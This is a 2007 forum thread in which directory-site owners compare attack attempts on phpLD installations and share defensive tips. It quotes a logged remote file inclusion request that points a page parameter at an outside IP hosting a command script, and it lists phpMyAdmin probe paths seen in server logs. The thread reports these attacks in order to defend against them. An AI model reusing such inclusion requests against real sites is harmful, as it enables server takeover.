Little heads up! ... First hacking attempt on my directory!

Discussion in 'Directories' started by msolution, Sep 14, 2007.

  1. #1
    Hi,
    seen loads of threads with hacked directories,
    so i ensure i have proper safe guards in place,
    instant emails where a out-of-place url is typed!
    and full local backup and database backup cron jobs running on the hour!

    yeah ....somewhat edgy here :p

    this URL came today!
    http: // nic. dir .vc/look. php?id=http://211.155.235.169 /sewam / cmd.txt

    so.... please do ban the IP,

    Regards,
    M.
    PS:
    http://wq.apnic.net/apnic-bin/whois.pl?searchtext=211.155.235.169

    my advise, against this kind of an attack,
    first get in touch your coder and ask if the following functions are being used,
    if not ask your host to disable them,
    > exec
    > shell_exec
    > passthru
     
    msolution, Sep 14, 2007 IP
  2. domainsurfer

    domainsurfer Well-Known Member

    Messages:
    922
    Likes Received:
    20
    Best Answers:
    0
    Trophy Points:
    110
    #2
    Does phpld get hackd ? i thought its secure !
     
    domainsurfer, Sep 17, 2007 IP
  3. pixens

    pixens Active Member

    Messages:
    481
    Likes Received:
    9
    Best Answers:
    0
    Trophy Points:
    60
    #3
    Yes they do.
     
    pixens, Sep 17, 2007 IP
  4. Amator

    Amator Well-Known Member

    Messages:
    1,424
    Likes Received:
    55
    Best Answers:
    0
    Trophy Points:
    165
    #4
    Nothing is 100% secure
     
    Amator, Sep 18, 2007 IP
  5. msolution

    msolution Well-Known Member

    Messages:
    1,182
    Likes Received:
    123
    Best Answers:
    0
    Trophy Points:
    175
    #5
    i didnt get hacked, ....just attacked :D

    someone was snooping around! so a little heads up for the IP address!

    yes... nothing is 100% secure,....
    but the way phpLD is built up it is very secure,

    but still , one has to watch out for these guys,
    a**hole crackers are always lookin for security holes!

    M.
     
    msolution, Sep 18, 2007 IP
  6. Obelia

    Obelia Notable Member

    Messages:
    2,083
    Likes Received:
    171
    Best Answers:
    0
    Trophy Points:
    210
    #6
    Everything gets probed for security holes, constantly. Phpld is probably the biggest directory target for hackers, simply because it's the most used. Always run the latest version and you should be safer.

    Take a look at your 404 stats: this should give you an idea of how many bots are looking for things you might have installed, in the hope you have some outdated code they can use to cause mayhem, steal data, or just turn your server into a spam zombie. I think most 404s are caused by bots rather than people.
     
    Obelia, Sep 18, 2007 IP
  7. Red_Virus

    Red_Virus Well-Known Member

    Messages:
    3,756
    Likes Received:
    249
    Best Answers:
    0
    Trophy Points:
    135
    #7
    Thanks so much for the info, Can u let us know how did u find this IP was attacking.

     
    Red_Virus, Sep 18, 2007 IP
  8. SilkySmooth

    SilkySmooth Well-Known Member

    Messages:
    1,583
    Likes Received:
    269
    Best Answers:
    0
    Trophy Points:
    180
    #8
    Indeed, I've lost count on the number of variations for 'phpMyAdmin'... here are just a few from the past hour!

    /phpMyAdmin-2.5.5-rc1/main.php
    /phpMyAdmin-2.6.1-rc1/main.php
    /phpMyAdmin-2.6.1-pl2/main.php
    /phpMyAdmin-2.5.5/main.php
    /phpMyAdmin-2.8.0.4/main.php
    /phpMyAdmin-2.8.0/main.php
    /phpMyAdmin-2.6.2/main.php
    /phpMyAdmin-2.6.1-pl3/main.php
    /phpMyAdmin-2.5.5-pl1/main.php
    /phpMyAdmin-2.6.4/main.php
    /phpMyAdmin-2.8.1-rc1/main.php
    /phpMyAdmin-2.7.0-pl2/main.php
    /phpMyAdmin-2.6.0-rc2/main.php
    /phpMyAdmin-2.8.0-rc2/main.php
    /phpMyAdmin-2.8.2/main.php
     
    SilkySmooth, Sep 18, 2007 IP
  9. coolmanphp

    coolmanphp Peon

    Messages:
    1,075
    Likes Received:
    11
    Best Answers:
    0
    Trophy Points:
    0
    #9
    thanks for the heads-up..
     
    coolmanphp, Sep 18, 2007 IP
  10. msolution

    msolution Well-Known Member

    Messages:
    1,182
    Likes Received:
    123
    Best Answers:
    0
    Trophy Points:
    175
    #10
    As Obelia rightly pointed out 404 Pages, i am using phpLD 2.1.2,....(modded beyond the possibility of an upgrade!!!), so i have my own 404 pages

    u could use flat files to keep track of 404 pages,

    the IP was in the querystring, ....and amazingly the file is still there!
    http://211.155.235.169 /sewam / cmd.txt

    perhaps the guy is busy hitting various people with the same file!


    Regards,
    M.
     
    msolution, Sep 18, 2007 IP
  11. blade007

    blade007 Peon

    Messages:
    346
    Likes Received:
    9
    Best Answers:
    0
    Trophy Points:
    0
    #11
    it's not only PHPLD. Installations that are commonly used around the net are prime for a quick hack attack, like WordPress or Gallery2.
     
    blade007, Sep 18, 2007 IP
  12. tarponkeith

    tarponkeith Well-Known Member

    Messages:
    4,758
    Likes Received:
    279
    Best Answers:
    0
    Trophy Points:
    180
    #12
    Hey,
    thanks for the heads up on the IP...

    I'm not sure if it was a hacking attempt, but under "site title", someone tried to enter something like:

    into my directory the other day... Do they think I don't review the submissions?
     
    tarponkeith, Sep 18, 2007 IP
  13. Obelia

    Obelia Notable Member

    Messages:
    2,083
    Likes Received:
    171
    Best Answers:
    0
    Trophy Points:
    210
    #13
    That possibly was a hacking attempt, checking to see if they could do an SQL injection on your form. Or it could be a test to see whether you're publishing things without moderation: the spammer will hit loads of websites with these form entries, then search for the odd-looking text. Anywhere it comes up, he will return to spam into oblivion.
     
    Obelia, Sep 19, 2007 IP
  14. msolution

    msolution Well-Known Member

    Messages:
    1,182
    Likes Received:
    123
    Best Answers:
    0
    Trophy Points:
    175
    #14
    :mad::mad:

    now this guy has a BOT working!!!

    At URL : nic.dir.vc/index.php?page=http://211.155.235.169/sewam/cmd.txt?
    Referrer :
    UA : libwww-perl/5.65

    (im assuming libwww-perl/5.65 is a bot made in perl :confused:)

    how much extra time do people have?:rolleyes:
     
    msolution, Sep 30, 2007 IP